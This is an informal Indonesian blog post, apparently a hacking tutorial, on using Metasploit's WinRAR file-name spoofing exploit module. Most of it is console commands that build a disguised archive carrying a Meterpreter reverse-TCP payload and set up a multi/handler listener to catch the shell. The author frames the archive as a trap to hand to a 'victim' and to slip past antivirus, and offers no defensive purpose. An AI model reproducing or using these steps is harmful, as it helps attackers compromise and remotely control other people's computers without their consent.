Belom lama ini dunia lagi ramai dengan "Winrar File Spoofing"
sampai-sampai metasploit membual module exploit nya..
http://www.exploit-db.com/exploits/32752/
Saya pun tertarik untuk mencoba nya ^ ^
Menurut gw ini cukup bagus ya,buat memanipulasi trap ( jebakan ) ke victim
bisa lolos dari Anti Virus ( entahlah, gak banyak saya test ke AV lain )
Requiment :
Metasploit v4.9.2 atau lebih
more info about metasploit v4.9.2 at https://community.rapid7.com/docs/DOC-2736
ok..mari kita coba
Open your metasploit console
msf > use exploit/windows/fileformat/winrar_name_spoofing
msf > set filename [ Name_File ]
msf > set spoof [ File_Trap ]
msf > set payload windows/meterpreter/reverse_tcp
msf > set lhost [ your IP ]
msf > set lport
Kita buat file nya dengan perintah "exploit"
file berada di directory /root/.msf4/local/
ok,next kita hanya tinggal kasih ke victim :)
Jalankan exploit multi handler
msf > use exploit/multi/handler
untuk melisten/ menerima koneksi dari target via exploit yg tadi dibuat
and..ketik si victim membuka file tersebut,
**damm ,you got meterpreter session
